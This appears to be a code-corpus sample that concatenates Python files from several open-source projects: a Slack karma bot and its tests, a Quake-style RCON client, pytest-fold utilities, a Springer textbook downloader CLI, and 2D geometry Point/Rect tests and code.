if not isinstance(points, int):
err = (
"Program bug: change_karma should "
"not be called with a non int for "
"points arg!"
)
raise RuntimeError(err)
try:
if self.receiver.user_id == self.giver.user_id:
raise ValueError("Sorry, cannot give karma to self")
points = self._calc_final_score(points)
self.receiver.karma_points += points
self.session.commit()
self._save_transaction(points)
if self.receiver.user_id == KARMABOT_ID:
return self._create_msg_bot_self_karma(points)
else:
return self._create_msg(points)
finally:
logging.info(
(
f"[Karmachange] {self.giver.user_id} to "
f"{self.receiver.user_id}: {points}"
)
)
self.session.close()
```
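To make the parsing step concrete, a small sketch of `_parse_karma_change` on two made-up inputs; this assumes `SLACK_ID_FORMAT` matches the usual `<@USERID>` mention form and that the module's settings are configured:
```python
from karmabot.karma import _parse_karma_change

# A Slack mention is unwrapped; net points = count('+') - count('-').
print(_parse_karma_change(("<@ABC123>", "+++")))   # expected: ('ABC123', 3)

# Anything else is stripped of ' #' and lowercased.
print(_parse_karma_change(("#PyBites", "++--")))   # expected: ('pybites', 0)
```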
#### File: karmabot/tests/test_karmabot.py
```python
import os
from datetime import datetime
from unittest.mock import patch
import pytest
from slackclient import SlackClient as RealSlackClient
from sqlalchemy import create_engine
from sqlalchemy.orm import Session
import karmabot.commands.topchannels
from karmabot.commands.joke import _get_closest_category
from karmabot.commands.topchannels import Channel, calc_channel_score
from karmabot.commands.welcome import welcome_user
from karmabot.db import db_session
from karmabot.db.karma_transaction import KarmaTransaction
from karmabot.db.karma_user import KarmaUser
from karmabot.karma import Karma, _parse_karma_change
from karmabot.settings import KARMABOT_ID, SLACK_CLIENT
from karmabot.slack import (
GENERAL_CHANNEL,
format_user_id,
get_available_username,
parse_next_msg,
perform_text_replacements,
)
from tests.slack_testdata import TEST_CHANNEL_HISTORY, TEST_CHANNEL_INFO, TEST_USERINFO
FAKE_NOW = datetime(2017, 8, 23)
@pytest.fixture
def frozen_now(monkeypatch):
class PatchedDatetime(datetime):
@classmethod
def now(cls, **kwargs):
return FAKE_NOW
monkeypatch.setattr(karmabot.commands.topchannels, "dt", PatchedDatetime)
@pytest.fixture(scope="session")
def engine():
return create_engine("sqlite://")
@pytest.fixture(scope="session")
def tables(engine):
KarmaUser.metadata.create_all(engine)
KarmaTransaction.metadata.create_all(engine)
yield
KarmaUser.metadata.drop_all(engine)
KarmaTransaction.metadata.drop_all(engine)
@pytest.fixture
def karma_users():
return [
KarmaUser(user_id="ABC123", username="pybob", karma_points=392),
KarmaUser(user_id="EFG123", username="<NAME>", karma_points=123),
KarmaUser(user_id="XYZ123", username="clamytoe", karma_points=420),
KarmaUser(user_id=KARMABOT_ID, username="karmabot", karma_points=10),
]
@pytest.fixture
def empty_db_session(engine, tables):
"""Returns an SQLAlchemy session, and after the tests
tears down everything properly.
"""
connection = engine.connect()
# begin the nested transaction
transaction = connection.begin()
# use the connection with the already started transaction
session = Session(bind=connection)
yield session
session.close()
# roll back the broader transaction
transaction.rollback()
# put back the connection to the connection pool
connection.close()
@pytest.fixture
def filled_db_session(engine, tables, karma_users):
"""Returns an SQLAlchemy session, and after the tests
tears down everything properly.
"""
connection = engine.connect()
# begin the nested transaction
transaction = connection.begin()
# use the connection with the already started transaction
session = Session(bind=connection)
session.bulk_save_objects(karma_users)
session.commit()
yield session
session.close()
# roll back the broader transaction
transaction.rollback()
# put back the connection to the connection pool
connection.close()
@pytest.fixture
def mock_filled_db_session(monkeypatch, filled_db_session):
def mock_create_session(*args, **kwargs):
return filled_db_session
monkeypatch.setattr(db_session, "create_session", mock_create_session)
@pytest.fixture
def mock_empty_db_session(monkeypatch, empty_db_session):
def mock_create_session(*args, **kwargs):
return empty_db_session
monkeypatch.setattr(db_session, "create_session", mock_create_session)
# Slack API mocks
# TODO: needs to consider multiple messages / types
@pytest.fixture
def mock_slack_rtm_read_msg(monkeypatch):
def mock_rtm_read(*args, **kwargs):
return [{"type": "message", "user": "ABC123", "text": "Hi everybody"}]
monkeypatch.setattr(RealSlackClient, "rtm_read", mock_rtm_read)
@pytest.fixture
def mock_slack_rtm_read_team_join(monkeypatch):
def mock_rtm_read(*args, **kwargs):
return [{"type": "team_join", "user": {"id": "ABC123", "name": "bob"}}]
monkeypatch.setattr(RealSlackClient, "rtm_read", mock_rtm_read)
@pytest.fixture
def mock_slack_api_call(monkeypatch):
def mock_api_call(*args, **kwargs):
call_type = args[1]
if call_type == "users.info":
user_id = kwargs.get("user")
return TEST_USERINFO[user_id]
if call_type == "channels.info":
channel_id = kwargs.get("channel")
return TEST_CHANNEL_INFO[channel_id]
if call_type == "channels.history":
channel_id = kwargs.get("channel")
return TEST_CHANNEL_HISTORY[channel_id]
if call_type == "chat.postMessage":
return None
monkeypatch.setattr(RealSlackClient, "api_call", mock_api_call)
# Testing
def test_slack_team_join(mock_slack_rtm_read_team_join, mock_slack_api_call):
user_id = SLACK_CLIENT.rtm_read()[0].get("user")["id"]
welcome_user(user_id)
actual = parse_next_msg()
assert actual.user_id == KARMABOT_ID
assert actual.channel_id == GENERAL_CHANNEL
assert user_id in actual.text
assert "Introduce yourself in #general if you like" in actual.text
def test_slack_rtm_read(mock_slack_rtm_read_msg):
event = SLACK_CLIENT.rtm_read()
assert event[0]["type"] == "message"
assert event[0]["user"] == "ABC123"
assert event[0]["text"] == "Hi everybody"
# KarmaUser
def test_karma_user_formatted_user_id(karma_users):
assert karma_users[0].formatted_user_id() == "<@ABC123>"
assert karma_users[1].formatted_user_id() == "<@EFG123>"
assert karma_users[2].formatted_user_id() == "<@XYZ123>"
def test_karma_user_repr(karma_users):
assert (
repr(karma_users[0])
== "<KarmaUser> ID: ABC123 | Username: pybob | Karma-Points: 392"
)
@pytest.mark.parametrize(
"test_user_id, expected",
[("ABC123", "pybob"), ("EFG123", "<NAME>"), ("XYZ123", "clamytoe")],
)
def test_lookup_username(mock_filled_db_session, test_user_id, expected):
karma_user = db_session.create_session().query(KarmaUser).get(test_user_id)
assert karma_user.username == expected
def test_create_karma_user(mock_empty_db_session, mock_slack_api_call):
karma = Karma("ABC123", "XYZ123", "CHANNEL42")
assert karma.giver.username == "pybob"
assert karma.receiver.username == "clamytoe"
first = db_session.create_session().query(KarmaUser).get("ABC123")
second = db_session.create_session().query(KarmaUser).get("XYZ123")
assert first.username == "pybob"
assert second.username == "clamytoe"
# Messages / Slack
def test_get_cmd():
pass
def test_perform_bot_cmd():
pass
def test_parse_next_msg():
pass
def test_create_help_msg():
pass
@pytest.mark.parametrize(
"test_text, expected", [("Cheers everybody", "To _cheers_ I say: :beers:")]
)
def test_perform_text_replacements(test_text, expected):
assert perform_text_replacements(test_text) == expected
# Karma
@pytest.mark.parametrize(
"test_change, expected",
[(("<@ABC123>", "+++"), ("ABC123", 3)), (("<@XYZ123>", "----"), ("XYZ123", -4))],
)
def test_parse_karma_change(test_change, expected):
assert _parse_karma_change(test_change) == expected
@pytest.mark.parametrize(
"test_changes",
[
("ABC123", "XYZ123", "CHANNEL42", 2),
("XYZ123", "ABC123", "CHANNEL42", 5),
("EFG123", "ABC123", "CHANNEL42", -3),
],
)
def test_change_karma(mock_filled_db_session, test_changes, mock_slack_api_call):
session = db_session.create_session()
pre_change_karma = session.query(KarmaUser).get(test_changes[1]).karma_points
karma = Karma(test_changes[0], test_changes[1], test_changes[2])
karma.change_karma(test_changes[3])
post_change = session.query(KarmaUser).get(test_changes[1]).karma_points
assert post_change == (pre_change_karma + test_changes[3])
session.close()
def test_change_karma_msg(mock_filled_db_session):
karma = Karma("ABC123", "XYZ123", "CHANNEL42")
assert karma.change_karma(4) == "clamytoe's karma increased to 424"
karma = Karma("EFG123", "ABC123", "CHANNEL42")
assert karma.change_karma(-3) == "pybob's karma decreased to 389"
def test_change_karma_exceptions(mock_filled_db_session):
with pytest.raises(RuntimeError):
karma = Karma("ABC123", "XYZ123", "CHANNEL42")
karma.change_karma("ABC")
with pytest.raises(ValueError):
karma = Karma("ABC123", "ABC123", "CHANNEL42")
karma.change_karma(2)
def test_change_karma_bot_self(mock_filled_db_session):
karma = Karma("ABC123", KARMABOT_ID, "CHANNEL42")
assert (
karma.change_karma(2) == "Thanks pybob for the extra karma, my karma is 12 now"
)
karma = Karma("EFG123", KARMABOT_ID, "CHANNEL42")
assert (
karma.change_karma(3)
== "Thanks <NAME> for the extra karma, my karma is 15 now"
)
karma = Karma("ABC123", KARMABOT_ID, "CHANNEL42")
assert (
karma.change_karma(-3)
== "Not cool pybob lowering my karma to 12, but you are probably right, I will work harder next time"
)
def test_process_karma_changes():
pass
@pytest.mark.parametrize(
"test_user_id, expected", [("ABC123", "<@ABC123>"), ("<@ABC123>", "<@ABC123>")]
)
def test_format_user_id(test_user_id, expected):
assert format_user_id(test_user_id) == expected
@pytest.mark.parametrize(
"test_user_id, expected",
[("ABC123", "pybob"), ("EFG123", "<NAME>"), ("XYZ123", "clamytoe")],
)
def test_get_available_username(mock_slack_api_call, test_user_id, expected):
user_info = SLACK_CLIENT.api_call("users.info", user=test_user_id)
assert get_available_username(user_info) == expected
def _channel_score(channel):
channel_info = channel["channel"]
return calc_channel_score(
Channel(
channel_info["id"],
channel_info["name"],
channel_info["purpose"]["value"],
len(channel_info["members"]),
float(channel_info["latest"]["ts"]),
channel_info["latest"].get("subtype"),
)
)
def test_channel_score(mock_slack_api_call, frozen_now):
most_recent = SLACK_CLIENT.api_call("channels.info", channel="CHANNEL42")
less_recent = SLACK_CLIENT.api_call("channels.info", channel="CHANNEL43")
assert _channel_score(most_recent) > _channel_score(less_recent)
@patch.dict(os.environ, {"SLACK_KARMA_INVITE_USER_TOKEN": "<PASSWORD>..."})
@patch.dict(os.environ, {"SLACK_KARMA_BOTUSER": "U5Z6KGX4L"})
def test_ignore_message_subtypes(mock_slack_api_call, frozen_now):
latest_ignored = SLACK_CLIENT.api_call("channels.info", channel="SOMEJOINS")
all_ignored = SLACK_CLIENT.api_call("channels.info", channel="ONLYJOINS")
assert _channel_score(latest_ignored) > 0
assert _channel_score(all_ignored) == 0
@pytest.mark.parametrize(
"user_category, expected",
[
("all", "all"),
("neutral", "neutral"),
("chuck", "chuck"),
("", "all"),
("al", "all"),
("neutr", "neutral"),
("chuk", "chuck"),
("help", "all"),
],
)
def test_get_closest_category(user_category, expected):
assert _get_closest_category(user_category) == expected
``` |
{
"source": "JnyJny/PyRcon",
"score": 3
} |
#### File: PyRcon/PyRcon/QuakeRemoteConsole.py
```python
from socket import socket, AF_INET,SOCK_DGRAM,MSG_WAITALL,MSG_PEEK
from select import select
from .Exceptions import NoResponseError
class BaseRemoteConsole(object):
'''
XXX Needs more docs
'''
_SEQUENCE = 0x00
_CHUNKSZ = 2048
_PREFIX_BYTE = 0xff
_RCON_CMD = 'rcon '
def __init__(self,password,hostname='localhost',port=28960):
'''
:param: password - string password for server
:param: hostname - string, name or IP address of server
:param: port - integer, port number to contact on hostname
'''
self.passwd = password
self.host = hostname
self.port = port
def __repr__(self):
return '<%s(%s,%s,%s)>' % (self.__class__.__name__,
self.passwd,
self.host,
self.port)
@property
def reply_header(self):
'''
Override this property and provide a byte buffer that
is prefixed to data returned by the server.
'''
        return b''  # empty *bytes*, so bytes.startswith() and slicing work on raw socket data
@property
def prefix(self):
'''
        Byte values prefixing each command sent to the remote
        console. The Quake-style prefix was four bytes of 0xFF
        followed by the string 'rcon'. Later derivatives such as
        Call of Duty added a sequence byte between the last 0xFF
        and the 'rcon' string.
'''
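        # For this base class the resulting prefix works out to
        # b'\xff\xff\xff\xff\x00rcon ': four 0xFF bytes, the sequence
        # byte (0x00 here), then the 'rcon ' command string.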
try:
return self._prefix
except AttributeError:
data = [self._PREFIX_BYTE] * 4
try:
data.append(self._SEQUENCE)
except AttributeError:
pass
data.extend(map(ord,self._RCON_CMD))
self._prefix = bytes(data)
return self._prefix
@property
def udp_sock(self):
'''
An (AF_INET,SOCK_DGRAM) socket
'''
try:
return self._udp_sock
except AttributeError:
self._udp_sock = socket(AF_INET,SOCK_DGRAM)
return self._udp_sock
@property
def address(self):
'''
A tuple of (host,port), determines where messages are sent.
'''
return (self.host,self.port)
def send(self,message,encoding,timeout,retries):
'''
:param: message - string holding command to send to server
:param: encoding - string, typically 'utf-8' XXX necessary?
:param: timeout - float seconds to wait for a response
:param: retries - integer number of times to timeout before failing
:return: string server response to client message
Sends 'message' to the server and waits for a response,
which is returned to the caller.
The Quake-style protocol does not have an EOM component, so a
timeout scheme is used to decide when the response is complete.
If no data is received after (timeout * retries) seconds, the
NoResponseError exception is raised which will contain the
message that was not acknowledged and the timeout and retries
used.
'''
data = self.prefix + bytes('%s %s'%(self.passwd,message),encoding)
self.udp_sock.sendto(data,self.address)
tries = 0
chunks = []
while True:
read_ready,_,_ = select([self.udp_sock],[],[],timeout)
if self.udp_sock in read_ready:
data = self.udp_sock.recv(self._CHUNKSZ)
if data.startswith(self.reply_header):
chunks.append(data[len(self.reply_header):])
else:
raise ValueError(data)
else:
tries += 1
if tries > retries:
break
if len(chunks) == 0:
raise NoResponseError(message,timeout,retries)
text = ''.join([chunk.decode() for chunk in chunks])
return text
    def clean(self, text, strdefs=None, emptyString=''):
        '''
        :param: text - string to be 'cleaned'
        :param: strdefs - list of tuples [(start_character,length)..];
                          defaults to [('^',2), ('"',1)] when None
:return: string with substrings defined in strdefs removed
Elides strings from the target text that start with
the specified character for the specified length.
'''
if strdefs is None:
strdefs = [ ('^',2), ('"',1) ]
for startToken,slen in strdefs:
if slen == 1:
text = text.replace(startToken,emptyString)
else:
try:
i = text.index(startToken)
text = text.replace(text[i:i+slen],emptyString)
except ValueError:
pass
return text
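# --- Usage sketch (illustrative only; password, host and command are assumptions) ---
#   rcon = BaseRemoteConsole('secret', hostname='127.0.0.1', port=28960)
#   status = rcon.send('status', 'utf-8', timeout=0.5, retries=3)
#   print(rcon.clean(status, [('^', 2), ('"', 1)]))  # strips two-char ^ colour codes and quotes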
``` |
{
"source": "JnyJny/pytest-fold",
"score": 3
} |
#### File: pytest-fold/pytest_fold/utils.py
```python
import re
from plugin import MARKERS
foldmark_matcher = re.compile(r".*(~~>PYTEST_FOLD_MARKER_)+(.*)<~~")
fail_begin_end_matcher = re.compile(r"(.+)((_BEGIN)|(_END))")
section_name_matcher = re.compile(r"~~>PYTEST_FOLD_MARKER_(\w+)")
def line_is_a_marker(line: str) -> bool:
if line.strip() == "":
return False
return line.strip() in (
MARKERS["pytest_fold_firstline"],
MARKERS["pytest_fold_errors"],
MARKERS["pytest_fold_failures"],
MARKERS["pytest_fold_failed_test"],
MARKERS["pytest_fold_terminal_summary"],
)
def line_is_lastline(line: str) -> bool:
if line.strip() == "":
return False
return line.strip() in MARKERS["pytest_fold_lastline"]
def sectionize(lines: list) -> list:
    """
    Parse lines from a Pytest run's console output which are marked with Pytest-Fold
    markers, and build up a list of sections, each a dict holding the section name and
    the ANSI text content for that part of the output. This function is meant to be
    called from the Pytest-Fold TUI for interactive display.
    """
sections = []
section = {"name": None, "content": ""}
lastline = False
for line in lines:
if line_is_a_marker(line):
sections.append(section.copy()) if section["name"] else None
section["content"] = ""
section["name"] = re.search(section_name_matcher, line).groups()[0]
elif line_is_lastline(line):
lastline = True
sections.append(section.copy())
section["content"] = ""
section["name"] = re.search(section_name_matcher, line).groups()[0]
else:
section["content"] += line
sections.append(section.copy()) if lastline else None
return sections
``` |
{
"source": "JnyJny/springer_downloader",
"score": 2
} |
#### File: springer_downloader/springer/__main__.py
```python
import typer
from loguru import logger
from pathlib import Path
from .constants import FileFormat, Language, Topic, Component
from .catalog import Catalog
cli = typer.Typer()
DOWNLOAD_REPORT = "DOWNLOAD_REPORT.txt"
@cli.callback()
def main(
ctx: typer.Context,
language: Language = typer.Option(
None,
"--language",
"-L",
show_choices=True,
show_default=True,
help="Choose catalog language",
),
topic: Topic = typer.Option(
None,
"--topic",
"-T",
show_default=True,
show_choices=True,
help="Choose a catalog topic.",
),
):
"""
__Springer Textbook Bulk Download Tool__
## NOTICE
The author of this software is not affiliated with Springer and this
tool is not authorized or supported by Springer. Thank you to
Springer for making these high quality textbooks available at no
cost.
\b
>"With the Coronavirus outbreak having an unprecedented impact on
>education, Springer Nature is launching a global program to support
>learning and teaching at higher education institutions
>worldwide. Remote access to educational resources has become
>essential. We want to support lecturers, teachers and students
>during this challenging period and hope that this initiative will go
>some way to help.
>
>Institutions will be able to access more than 500 key textbooks
>across Springer Nature’s eBook subject collections for free. In
>addition, we are making a number of German-language Springer medical
>training books on emergency nursing freely accessible. These books
>will be available via SpringerLink until at least the end of July."
[Source](https://www.springernature.com/gp/librarians/news-events/all-news-articles/industry-news-initiatives/free-access-to-textbooks-for-institutions-affected-by-coronaviru/17855960)
## Overview
This tool automates the process of downloading the Springer-provided
Excel catalogs, locating URLs and downloading the files in PDF or epub
format.
Catalogs are lists of books in a specific _language_, spanning a
_topic_. Catalogs are further subdivided into _packages_ which are
books grouped by sub-topics.
Textbooks can be downloaded by; title, package name or the entire
catalog. Title and package names can be incompletely specified and
are case-insensitive.
The available languages are: English & German.
The available topics are: _All Disciplines_ and _Emergency Nursing_.
**Note: The _Emergency Nursing_ topic is not available in English.**
## Source and License
Full source is available on
[GitHub](https://github.com/JnyJny/springer_downloader) and it is
licensed under the
[Apache-2.0](https://www.apache.org/licenses/LICENSE-2.0)
license.
## Installation
This utility can be installed using `pip`:
`$ python3 -m pip install springer`
Or from the latest source on GitHub:
`$ python3 -m pip install git+https://github.com/JnyJny/springer_downloader`
"""
# EJO The callback function is called before any of the command functions
# are invoked. Since all the subcommands work with an instantiation of
# springer.catalog.Catalog, we create one in the callback and attach it
# to the typer.Context object using the attribute 'obj'. I don't
# particularly care for accessing the catalog as 'ctx.obj' in the
# subcommands, but I haven't found a better solution to this "problem"
# yet.
try:
ctx.obj = Catalog(language, topic)
except KeyError as error:
typer.secho(
f"Failed to locate a catalog for: '{error.args[0].value!s}'", fg="red"
)
raise typer.Exit(-1)
@cli.command(name="get-default-catalog")
def get_default_catalog_subcommand():
"""Print the default catalog identifier.
This is the default catalog that will be used when listing books and packages
and the user has not specified a --language or --topic on the command line.
"""
typer.secho(f"Default: {Catalog(fetch=False)}", fg="green")
@cli.command(name="set-default-catalog")
def set_default_catalog_subcommand(ctx: typer.Context,):
"""Set default catalog language and topic.
__Examples__
Set the default catalog to German language:
`$ springer --language de set-default-catalog`
Set the default catalog to German and emergency nursing:
`$ springer --language de --topic med set-default-catalog`
Set the default catalog to English and all disciplines topic:
`$ springer --language en --topic all set-default-catalog`
Note: The only English language catalog is `en-all`.
"""
prev = Catalog(fetch=False)
ctx.obj.save_defaults()
typer.secho(f"Old Default: {prev!s}", fg="red" if prev.is_default else "blue")
typer.secho(f"New Default: {Catalog(fetch=False)!s}", fg="green")
@cli.command(name="list")
def list_subcommand(
ctx: typer.Context,
component: Component,
name: str = typer.Option(
None, "--name", "-n", help="Name to match against title or pacakge."
),
long_format: bool = typer.Option(
False,
"--long-format",
"-l",
is_flag=True,
show_default=True,
help="Display selected information in a longer format.",
),
):
"""List books, package, packages, catalog or catalogs.
Display information about books, packages, and catalogs. Packages
are sets of books grouped by subject.
__Examples__
List titles available in the default catalog:
`$ springer list books`
List packages available in the default catalog:
`$ springer list packages`
List titles available in the German language, all disciplines catalog:
`$ springer --language de --topic all list books`
List all eBook packages in the default catalog:
`$ springer list packages`
    List all eBook packages in the default catalog whose names match:
    `$ springer list package -n science`
List information about the current catalog:
`$ springer list catalog`
    List information about the German language, Emergency Nursing catalog:
`$ springer --language de --topic med list catalog`
"""
if component == Component.Books:
ctx.obj.list_textbooks(long_format, name)
return
if component is Component.Package:
if name:
for pkgname, pkginfo in ctx.obj.packages.items():
if name.casefold() in pkgname.casefold():
ctx.obj.list_package(pkgname, pkginfo, long_format)
return
else:
component = Component.Packages
if component is Component.Packages:
ctx.obj.list_packages(long_format)
return
if component is Component.Catalog:
catalogs = [ctx.obj]
if component is Component.Catalogs:
catalogs = Catalog.all_catalogs()
for catalog in catalogs:
catalog.list_catalog(long_format)
@cli.command(name="refresh-catalog")
def refresh_subcommand(
ctx: typer.Context,
catalog_url: str = typer.Option(
None, "--url", "-u", help="URL for Excel-formatted catalog."
),
all_catalogs: bool = typer.Option(False, "--all", is_flag=True),
):
"""Refresh the cached catalog of springer textbooks.
If `--all` is specified, the `--url` option is ignored.
__Examples__
Update English language catalog:
`$ springer --language en refresh`
Update German language catalog whose topic is 'all':
`$ springer --language de --topic all refresh`
Update German language catalog whose topic is 'med' with a new url:
`$ springer -l de -d med refresh --url https://example.com/api/endpoint/something/v11`
__NOTE: THIS URL DOES NOT REPLACE THE DEFAULT URL FOR THE TARGET CATALOG__
Update all catalogs:
`$ springer refresh-catalog --all`
"""
if not all_catalogs:
ctx.obj.fetch_catalog(catalog_url)
print(ctx.obj)
return
for catalog in Catalog.all_catalogs():
catalog.fetch_catalog()
print(catalog)
@cli.command(name="clean-catalog")
def clean_subcommand(
ctx: typer.Context,
force: bool = typer.Option(False, "--force", "-F", is_flag=True),
all_catalogs: bool = typer.Option(False, "--all", is_flag=True),
):
"""Remove cached catalogs.
__Examples__
Remove the cached default catalog:
`$ springer clean-catalog --force`
Remove the cached German language _Emergency Nursing_ catalog:
`$ springer --language de --topic med clean-catalog --force`
Remove all catalogs:
`$ springer clean-catalog --force --all`
"""
if not force:
typer.secho("The --force switch is required!", fg="red")
raise typer.Exit(-1)
if not all_catalogs:
ctx.obj.cache_file.unlink()
return
for catalog in Catalog.all_catalogs():
catalog.cache_file.unlink()
def _configure_logger(path: Path, logfile: str = None) -> None:
"""Adds `path` / `logfile` to the logger configuration.
Makes sure that the path exists (including parents)
and enables logging to the specified file located in that
directory.
:param path: pathlib.Path
:param logfile: str
"""
logfile = logfile or DOWNLOAD_REPORT
logfmt = "{time:YYYY-MM-DD HH:mm} | <red>{message}</>"
logger.configure(
**{"handlers": [{"sink": path / logfile, "format": logfmt, "colorize": True,},]}
)
@cli.command("download")
def download_subcommand(
ctx: typer.Context,
component: Component,
name: str = typer.Option(
None, "--name", "-n", help="Name to match against title or package."
),
dest_path: Path = typer.Option(
Path.cwd(),
"--dest-path",
"-d",
show_default=True,
help="Destination directory for downloaded files.",
),
file_format: FileFormat = typer.Option(
FileFormat.pdf, "--format", "-f", show_default=True, show_choices=True,
),
overwrite: bool = typer.Option(
False,
"--over-write",
"-W",
is_flag=True,
show_default=True,
help="Over write downloaded files.",
),
):
"""Download textbooks from Springer
This command downloads textbooks from Springer to the local host. Files
are saved by default in PDF format to the current working directory.
If a download is interrupted by the user, it can be later restarted where
the interruption occurred without downloading previous files.
Problems encountered while downloading files are logged to:
`dest-path/DOWNLOAD_REPORT.txt`
__Examples__
Download all books in the default catalog in PDF format to the
current directory:
`$ springer download books`
Download all books in EPUB format whose title includes 'python':
`$ springer download books --name python --format epub`
Download all books into directories grouped by package:
    `$ springer download packages --dest-path by_pkgs`
Download all books in a specific package in EPUB format:
`$ springer download package --name 'Computer Science' --format epub`
Download all books in packages whose name includes `Science`:
`$ springer download package --name science --dest sciences`
Download all books in all catalogs [en-all, de-all, de-med] in EPUB format:
`$ springer download catalogs --format epub`
The `catalogs` download subcommand will create a set of directories by language
and topic for each catalog and save downloaded files into the appropriate
directory, eg:
\b
- dest-path/English/All_Disciplines/package_name/title.fmt
- dest-path/German/All_Disciplines/package_name/title.fmt
- dest-path/German/Emergency_Nursing/package_name/title.fmt
The `package` and `packages` subcommands will also save downloaded
files into directories with package names rooted in the destination
path:
\b
dest-path/package_name/title.fmt
...
See Also: `set-default-catalog`, `get-default-catalog`, `list`
"""
dest_path = dest_path.resolve()
dest_path.mkdir(mode=0o755, exist_ok=True, parents=True)
_configure_logger(dest_path)
try:
if component in [Component.Books, Component.Catalog]:
if not name:
ctx.obj.download(dest_path, file_format, overwrite)
else:
ctx.obj.download_title(name, dest_path, file_format, overwrite)
return
if component in [Component.Package, Component.Packages]:
if component is Component.Package:
if not name:
typer.secho(f"Please supply a `name` for package", fg="red")
raise typer.Exit(-1)
package_names = [name]
else:
package_names = ctx.obj.packages.keys()
for pkgname in package_names:
path = dest_path / pkgname.replace(" ", "_")
path.mkdir(mode=0o755, exist_ok=True, parents=True)
ctx.obj.download_package(pkgname, path, file_format, overwrite)
return
if component is Component.Catalogs:
for catalog in Catalog.all_catalogs():
path = dest_path / catalog.language.name / catalog.topic.name
path.mkdir(mode=0o755, exist_ok=True, parents=True)
for pkgname in catalog.packages:
path = dest_path / pkgname.replace(" ", "_")
path.mkdir(mode=0o755, exist_ok=True, parents=True)
catalog.download_package(pkgname, path, file_format, overwrite)
except KeyError as error:
typer.secho(str(error), fg="red")
raise typer.Exit(-1) from None
except PermissionError as error:
typer.secho("Permission error for: ", nl=False)
typer.secho(str(error.filename), fg="red")
raise typer.Exit(-1) from None
@cli.command("version")
def version_subcommand(ctx: typer.Context):
from .__version__ import __version__
typer.secho(f"{__version__}", fg="green")
```
#### File: tests/unit/test_catalog.py
```python
import pytest
from pathlib import Path
from pandas import DataFrame
from springer.catalog import Catalog
from springer.constants import Language, Topic
@pytest.fixture(scope="module")
def CATALOG():
return Catalog()
def test_creating_catalog_no_args():
catalog = Catalog()
assert catalog
assert isinstance(catalog, Catalog)
@pytest.mark.parametrize(
"lang,cat",
[
(Language.English, Topic.All_Disciplines),
(Language.German, Topic.All_Disciplines),
(Language.German, Topic.Emergency_Nursing),
],
)
def test_creating_catalog_with_args_xpass(lang, cat):
catalog = Catalog(lang, cat)
assert catalog
assert isinstance(catalog, Catalog)
assert catalog.language == lang
assert catalog.topic == cat
@pytest.mark.parametrize(
"lang,cat", [(Language.English, Topic.Emergency_Nursing),],
)
def test_creating_catalog_with_args_xfail(lang, cat):
with pytest.raises(KeyError):
catalog = Catalog(lang, cat)
@pytest.mark.parametrize(
"prop_name,prop_type",
[
("name", str),
("is_default", bool),
("language", Language),
("topic", Topic),
("url", str),
("config_dir", Path),
("defaults_file", Path),
("defaults", dict),
("cache_file", Path),
("ttable", dict),
("dataframe", DataFrame),
("packages", dict),
],
)
def test_catalog_property_existence_and_type(prop_name, prop_type, CATALOG):
value = getattr(CATALOG, prop_name)
assert isinstance(value, prop_type)
@pytest.mark.parametrize(
"method_name",
[
"__repr__",
"__str__",
"__iter__",
"__eq__",
"all_catalogs",
"content_url",
"save_defaults",
"fetch_catalog",
"textbooks",
"download_textbook",
"download_dataframe",
"download_dataframe_animated",
"download_title",
"download_package",
"download",
"list_dataframe",
"list_textbooks",
"list_package",
"list_packages",
"list_catalog",
],
)
def test_catalog_method_existence(method_name, CATALOG):
method = getattr(CATALOG, method_name)
assert callable(method)
def test_catalog_classmethod_all_catalogs():
for catalog in Catalog.all_catalogs():
assert isinstance(catalog, Catalog)
``` |
{
"source": "JnyJny/twod",
"score": 3
} |
#### File: twod/tests/test_point_add.py
```python
import pytest
from twod import Point
@pytest.mark.parametrize(
"A, B, expected",
[
[[0, 0], [0, 0], (0, 0)],
[[0, 0], [1, 1], (1, 1)],
[[0, 0], [-1, -1], (-1, -1)],
[[1, 1], [-1, -1], (0, 0)],
],
)
def test_point_addition_with_point(A, B, expected):
result = Point(*A) + Point(*B)
assert result == expected
@pytest.mark.parametrize(
"A, scalar, expected",
[
[[0, 0], -1, [-1, -1]],
[[1, 1], -1, [0, 0]],
[[0, 0], 1, [1, 1]],
[[1, 1], 1, [2, 2]],
[[0, 0], 0, [0, 0]],
[[1, 1], 0, [1, 1]],
[[0, 0], -1.0, [-1, -1]],
[[1, 1], -1.0, [0, 0]],
[[0, 0], 1.0, [1, 1]],
[[1, 1], 1.0, [2, 2]],
[[0, 0], 0.0, [0, 0]],
[[1, 1], 0.0, [1, 1]],
],
)
def test_point_addition_with_scalar(A, scalar, expected):
result = Point(*A) + scalar
assert result == expected
@pytest.mark.parametrize(
"A, iterable, expected",
[
[(0, 0), [1, 1], (1, 1)],
[(0, 0), (2, 2), (2, 2)],
[(0, 0), [3, 2, 1], (3, 2)],
],
)
def test_point_addition_with_iterable(A, iterable, expected):
result = Point(*A) + iterable
assert result == expected
```
#### File: twod/tests/test_point_iadd.py
```python
import pytest
from twod import Point
@pytest.mark.parametrize(
"A, B, expected",
[
[[0, 0], [0, 0], (0, 0)],
[[1, 2], [2, 3], [3, 5]],
],
)
def test_point_inplace_addition_with_point(A, B, expected):
p = Point(*A)
p += Point(*B)
assert p == expected
@pytest.mark.parametrize(
"A, iterable, expected",
[
[(0, 0), [1, 1], (1, 1)],
[(0, 0), (2, 2), (2, 2)],
[(0, 0), [3, 2, 1], (3, 2)],
],
)
def test_point_inplace_addition_with_iterable(A, iterable, expected):
r = Point(*A)
r += iterable
assert r == expected
@pytest.mark.parametrize(
"A, scalar, expected",
[
[[0, 0], 1, [1, 1]],
],
)
def test_point_inplace_addition_with_scalar(A, scalar, expected):
p = Point(*A)
p += scalar
assert p == expected
```
#### File: twod/twod/rect.py
```python
from dataclasses import astuple, dataclass
from .point import Point
from typing import Any
from typing import Dict
from typing import List
@dataclass
class Rect(Point):
"""A rectangle specified by an origin at (x,y) and
dimensions (w,h).
"""
w: int = 0
h: int = 0
@property
def A(self) -> Point:
"""Point at (x,y)."""
return Point(self.x, self.y)
@property
def B(self) -> Point:
"""Point at (x+w, y)."""
return Point(self.x + self.w, self.y)
@property
def C(self) -> Point:
"""Point at (x+w, y+h)."""
return Point(self.x + self.w, self.y + self.h)
@property
def D(self) -> Point:
"""Point at (x, y+h)."""
return Point(self.x, self.y + self.h)
@property
def vertices(self) -> List[Point]:
"""The points A, B, C, and D in a list.
"""
return [self.A, self.B, self.C, self.D]
@property
def sides(self) -> List[float]:
"""The lengths of each side: AB, BC, CD, and DA.
"""
return [
max(abs(self.A - self.B)),
max(abs(self.B - self.C)),
max(abs(self.C - self.D)),
max(abs(self.D - self.A)),
]
@property
def center(self) -> Point:
